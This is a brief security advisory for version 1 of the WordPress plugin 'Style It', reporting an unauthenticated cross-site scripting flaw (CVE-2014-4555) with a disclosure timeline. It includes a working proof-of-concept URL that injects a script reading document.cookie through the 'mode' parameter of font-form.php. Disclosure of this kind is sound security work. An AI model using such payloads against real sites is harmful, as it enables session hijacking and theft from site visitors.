wp-plugin : style-it

Plugin Details
Plugin Name: wp-plugin : style-it
Effected Version : 1 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://localhost/wordpress/wp-content/wp-plugs/styleit/fonts/font-form.php?mode=mode%22%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&


Disclosure Timeline
Vendor Contacted : 2014-01-22
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number : CVE-2014-4555
Plugin Description :
[| This plugin enables you to manage background and fonts of almost every item in your wordpress blog. This plugin by default supports google fonts and cufon js fonts. Style It also features a powerful editor where you can change various settings like background-image, background-url, color, etc. This plugin is very easy to optimize for any blog. [Style It Homepage](http://www.unizoe.com/products/style-it-wp/ "Plugin homepage") ]